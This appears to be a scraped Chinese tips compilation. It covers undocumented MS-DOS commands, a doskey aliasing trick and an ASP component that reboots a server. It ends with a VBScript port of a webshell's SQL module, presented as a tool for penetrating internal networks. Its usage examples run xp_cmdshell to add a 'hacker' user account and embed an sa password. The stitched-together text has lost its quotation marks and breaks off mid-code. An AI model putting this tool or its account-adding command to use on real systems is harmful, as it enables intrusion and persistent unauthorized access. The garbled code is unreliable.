dos命令与参数.doc

dos系统中有许多未公开的命令与参数。由于dos的有好几种，所以下面仅以msdos为例，介绍一下常用命令中的未公开的命令与参数。经过比较，发现在msdos的各版本中，7.x版中的未公开命令与参数是最多的，这些7.x版本中的未公开命令与参数在其它dos版本中通常是没有的，但却是非常实用的，例如command /z命令，这是用dos自带的命令显示errorlevel（错误返回代码）值的唯一方法（当然，用其它的附加工具，如err2env等也可以做到）。dos未公开命令：truename：用于显示实际的路径，对subst等命令很有用。installhigh：用在config.sys中，将文件调入umb。logo和comment：仅用在dos7中的config.sys中，用法未知。dos未公开参数：command /f 使fail作为abort,retry,fail中的默认选项。command /d 在dos5中是禁止autoexec.bat自动执行；在6.0+版本中是禁止/f参数。command /z 显示errorlevel（错误返回代码）信息。command /t 在dos7.x中强制将永久性调入常规内存。format /autotest 自动完成格式化过程。format /backup 自动完成格式化过程，并提示输入卷标。format /select 只在磁盘上备份系统区数据，相当于mirror程序。format /select /u 将引导区和文件分配表用f6h填之。format /z:n 设置fat32分区上的簇大小。fdisk /mbr 重写硬盘主引导记录。fdisk /cmbr drive 重写指定驱动器上的主引导记录。fdisk /pri:size 创建主分区。fdisk /ext:size 创建扩展分区。fdisk /log:size 在扩展分区上创建逻辑驱动器。fdisk /prmt|/q 提示行动/安静模式。fdisk /partn 将分区表信息保存到partsav.fil中。fdisk /actok 用于dos7中，跳过完整性测试。fdisk /fprmt 用于dos7中，自动采用fat32，并跳过提示信息。doskey /appedit 使doskey也应用于其它程序（如debug等）中。doskey /command和/permanent和/scrsize和/xhistory 用法未知。scandisk /clip 用于dos7中，将长文件名剪为短文件名。scandisk /nolost 用于dos7中，不提示表面测试或丢失簇。scandisk /noui和/text 用于dos7中，使用标准的dos界面。scandisk /mount 相当于scandisk.ini中的mount=always。scandisk /time 相当于scandisk.ini中的scantimeout=on。qbasic /qhelp 进入dos6的全屏幕帮助系统，相当于执行help命令。qbasic /edcom 进入dos6的文件编辑器，相当于执行edit命令。mem /a或mem /all 显示hma信息。ver /r 显示扩展的版本信息。dir /z 用于dos7中，表示不显示长文件名。dos=single 用在dos7中的config.sys中，启动单一模式的dos。device=himem.sys /q 当himem.sys加载时使用安静模式。device=emm386.exe notr 不要检测token ring网络适配器。dos未公开用法：if exist xmmxxxx0 . 此命令可以判断当前是否安装了himem.sys驱动程序。if exist emmxxxx0 . 此命令则用来判断当前是否安装了emm386驱动程序。dir , 用在dos7以前的版中中，显示所有文件，相当于dir /a。: 此符号可在批处理文件中代替rem注解命令，可以加快运行速度。自定义cmd命令，打造自己的个性命令去网上搜索了这个命令，貌似都是宏设置之类的，特此献上自己的一些使用方法。这个命令可以自己分配自己想要的CMD命令，很有个性，更改了也可以防止后台被执行CMD命令。这里以我在本机上测试为例。我想用xiaohei代替dir命令。我只要在cmd下输入doskey xiaohei=dirdoskey dir=echo bad command or file name现在dir命令将无法使用，由我设置的xiaohei代替了。输入dir显示Bad Command Or File Name,而输入我自己设置的xiaohei，就是以前dir一样的功能。知道这个用法，我们还可以使fdisk、format、deltree等危险的命令失效。要使xiaohei还原成dir命令，只需要执行doskey dir=doskey xiaohei=即可完成命令的还原操作。附件一份供大家参考：C:Documents and SettingsAdministrator桌面doskey xiaohei=dirC:Documents and SettingsAdministrator桌面doskey dir=echo bad command ornameC:Documents and SettingsAdministrator桌面dirbad command or file nameC:Documents and SettingsAdministrator桌面xiaohei驱动器 C 中的卷没有标签。卷的序列号是 FCE0-8FFAC:Documents and SettingsAdministrator桌面doskey dir=C:Documents and SettingsAdministrator桌面doskey xiaohei=C:Documents and SettingsAdministrator桌面xiaoheixiaohei 不是内部或外部命令，也不是可运行的程序或批处理文件。C:Documents and SettingsAdministrator桌面dir驱动器 C 中的卷没有标签。卷的序列号是 FCE0-8FFA使用ASP脚本命令重启服务器大家知道直接使用ASP是不能够重启服务器的，这时我们需要制作一个组件来实现功能，ASP通过这个组件调用系统API，然后按照不同的重启和关机方式进行操作！ 下面先说COM的制作，在VB中新建一工程，当然是AceiveX dll的！ 1）先修改工程属性，在工程属性窗口将工程名称改为system，在类模块窗口将模块名称改为contral，保存工程； 2）然后添加一个模块，用来声明需要使用的API和常数！下面是模块中的内容！ Declare Function ExitWindowsEx Lib user32 (ByVal uFlags As Long, ByVal dwReserved As Long) As Long 3）在类模块中输入下列代码： Public Function reboot(atype As Variant) t& = ExitWindowsEx(1, atype) End Function 该函数需要传入一个参数，用来控制启动方式，这个参数是从ASP程序中传入的，等一下就可以看到具体的使用方法！ 编写完上面的代码，保存工程，将工程编译为system.dll。下面就写ASP程序！ ASP中的代码非常简单： 其中atype可以使用0、1、2、4，0、1和4均为关机，2用来重启。写完后执行ASP就可以了！花了一点时间把以前的海阳顶端2006的sql模块改成vbs版了，和它的功能是一模一样的，不过用起来可能没有asp版的舒服，不过能用，可以用在dos下了，渗透内网时估计你用得着。if (lcase(right(wscript.fullname,11)=wscript.exe) thenecho Execute it under the cmd.exe Plz! Thx.echo code by lcxwscript.quitend Ifif wscript.arguments.count1 then echo Usage: cscript sql.vbs showTables e:hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs; echo usage: cscript sql.vbs query 连接字符串 sql语句 echo exp:cscript sql.vbs showTables &Chr(34)&sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs&Chr(34) echo exp:cscript sql.vbs query &Chr(34)&sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&select * from name&chr(34)&Space(1) & 1 echo exp:cscript sql.vbs query &Chr(34)&sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&update.&chr(34)&Space(1) & 1 echo exp:cscript sql.vbs query &Chr(34)&sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&exec master.dbo.xp_cmdshell net user ice hacker /add-&chr(34)&Space(1) & 1end IfSub chkErr(Err) If Err Then echo 错误: & Err.Description & 错误源: & Err.Source & vbcrlf Err.Clear wscript.quit End IfEnd SubSub echo(str) wscript.echo strEnd SubFunction fixNull(str) If IsNull(str) Then str = End If fixNull = strEnd FunctionSub showErr(str) Dim i, arrayStr arrayStr = Split(str, $) echo 出错信息:&vbcrlf For i = 0 To UBound(arrayStr) echo (i + 1) & . & arrayStr(i) & Next echo vbcrlf wscript.quitEnd SubRem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Rem 下面是程序模块选择部分Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-PageMsDataBase() Sub pageMsDataBase() Dim theAct, sqlStr theAct = Wscript.Arguments(0) sqlStr = Wscript.Arguments(1) Select Case theAct Case showTables showTables() Case query showQuery() End SelectEnd SubSub showTables() Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr sqlStr = Wscript.Arguments(1) If LCase(Left(sqlStr, 4) = sql: Then connStr = Mid(sqlStr, 5) Else connStr = Provider=Microsoft.Jet.Oledb.4.0;Data Source= & sqlStr End If Set conn = CreateObject(Adodb.Connection) conn.Open connStr chkErr(Err) tablesStr = getTableList(conn, sqlStr, rsTable) echo tablesStr & = Do Until rsTable.Eof Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable(Table_Name).value) echo rsTable(Table_Name) &vbcrlf Do Until rsColumn.Eof echo 字段名: & rsColumn(Column_Name)&vbclrf echo 类型: & getDataType(rsColumn(Data_Type) & vbclrf echo 大小: & rsColumn(Character_Maximum_Length) & vbclrf echo 精度: & rsColumn(Numeric_Precision) & vbclrf echo 允许为空: & rsColumn(Is_Nullable) & vbclrf echo 默认值: & rsColumn(Column_Default) & vbclrf&vbclrf rsColumn.MoveNext Loop rsTable.MoveNext echo vbcrlf Loop echo = conn.Close Set conn = Nothing Set rsTable = Nothing Set rsColumn = NothingEnd SubSub showQuery() Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable sqlStr = Wscript.Arguments(1) theTable = Wscript.Arguments(2) sql=Wscript.Arguments(3) page=Wscript.Arguments(4) If Not IsNumeric(page) or page = Then page = 1 End If If LCase(Left(sqlStr, 4) = sql: Then connStr = Mid(sqlStr, 5) Else connStr = Provider=Microsoft.Jet.Oledb.4.0;Data Source= & sqlStr End If Set rs = CreateObject(Adodb.RecordSet) Set conn = CreateObject(Adodb.Connection) conn.Open connStr chkErr(Err) tablesStr = getTableList(conn, sqlStr, rsTable) echo 数据库表结构查看: echo tablesStr & = echo SQL命令执行及查看:&vbcrlf If sql And Left(LCase(sql), 7) = select Then rs.Open sql, conn, 1, 1 chkErr(Err) rs.PageSize = 20 If Not rs.Eof Then rs.AbsolutePage = page End If If rs.Fields.Count0 Then echo SQL操作 - 执行结果&vbcrlf echo =&theTable&列名如下= For j = 0 To rs.Fields.Count-1 echo rs.Fields(j).Name & vbcrlf Next For i = 1 To 20 If rs.Eof Then Exit For End If For j = 0 To rs.Fields.Count-1 echo fixNull(rs(j)& vbcrlf Next rs.MoveNext Next End If echo = echo